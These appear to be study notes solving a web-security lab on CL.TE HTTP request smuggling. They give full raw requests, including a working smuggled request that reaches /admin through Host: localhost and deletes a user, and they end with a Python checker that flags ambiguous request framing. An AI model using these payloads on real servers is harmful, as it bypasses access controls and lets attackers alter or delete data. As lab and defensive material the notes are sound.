06 - Exploiting HTTP request smuggling to bypass front-end security controls, CL.TE vulnerability

This request returns 401 Unauthorized - Admin interface only available to local users:

POST / HTTP/1.1\r\n
Host: 0a97002803ea466780098fc60048004f.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 29\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
GET /admin HTTP/1.1\r\n
X-Ignore: X

This request returns 400 Duplicate header names are not allowed (because the second request would contain two Host headers):

POST / HTTP/1.1\r\n
Host: 0a2800630360d96281b525e60080002c.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 54\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
GET /admin HTTP/1.1\r\n
Host: localhost\r\n
X-Ignore: X

The payload that works is the following, because this way the normal request that gets concatenated to it becomes part of the body:

(The Content-Length has to be length(x=) + 1 && > 6, that is, in this case it has to be 6)

POST /admin HTTP/1.1\r\n
Host: localhost\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 6\r\n
\r\n
x=

The second request will end up looking like this:

POST /admin HTTP/1.1\r\n
Host: localhost\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 6\r\n
\r\n
x=POST / HTTP/1.1\r\n
Host: 0a2800630360d96281b525e60080002c.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 116\r\n
Transfer-Encoding: chunked\r\n

The lab would be solved with:

POST / HTTP/1.1
Host: 0a2800630360d96281b525e60080002c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
Transfer-Encoding: chunked

0

POST /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 6

x=
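
The requests above only work because the front-end delimits the body by Content-Length while the back-end delimits it by the chunked terminator. The following check is an added example, not part of the original notes: it parses a raw request both ways and reports the bytes the two parsers disagree on, which is what a front-end should reject. The host `example.test`, the function names and the sample request are constructed for illustration, and chunk trailers are assumed absent.

```python
# Added example: compare Content-Length framing with chunked framing.

def split_head(raw: bytes):
    """Return (headers, body); header names lower-cased, values kept as lists."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body

def chunked_end(body: bytes) -> int:
    """Offset just past the zero-size chunk that ends a chunked body."""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)            # ValueError if malformed
        size = int(body[pos:eol].split(b";")[0], 16)
        pos = eol + 2
        if size == 0:
            if body[pos:pos + 2] != b"\r\n":
                raise ValueError("trailers not supported in this example")
            return pos + 2
        pos += size + 2                           # chunk data plus its CRLF

def audit(raw: bytes) -> dict:
    """Flag requests whose length is ambiguous and show the disputed bytes."""
    headers, body = split_head(raw)
    cl = headers.get(b"content-length", [])
    te = headers.get(b"transfer-encoding", [])
    result = {"ambiguous": bool(cl) and bool(te),
              "conflicting_cl": len(set(cl)) > 1,
              "leftover": b""}
    if result["ambiguous"] and not result["conflicting_cl"]:
        # Bytes a CL parser counts as body but a TE parser reads as a new request.
        result["leftover"] = body[chunked_end(body):int(cl[0])]
    return result

# Constructed sample in the shape of the first request in these notes.
SMUGGLED = b"GET /admin HTTP/1.1\r\nX-Ignore: X"
BODY = b"0\r\n\r\n" + SMUGGLED
SAMPLE = (b"POST / HTTP/1.1\r\nHost: example.test\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
          b"Transfer-Encoding: chunked\r\n\r\n" + BODY)

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A front-end that rejects every request for which `ambiguous` or `conflicting_cl` is true never forwards the disputed bytes to the back-end.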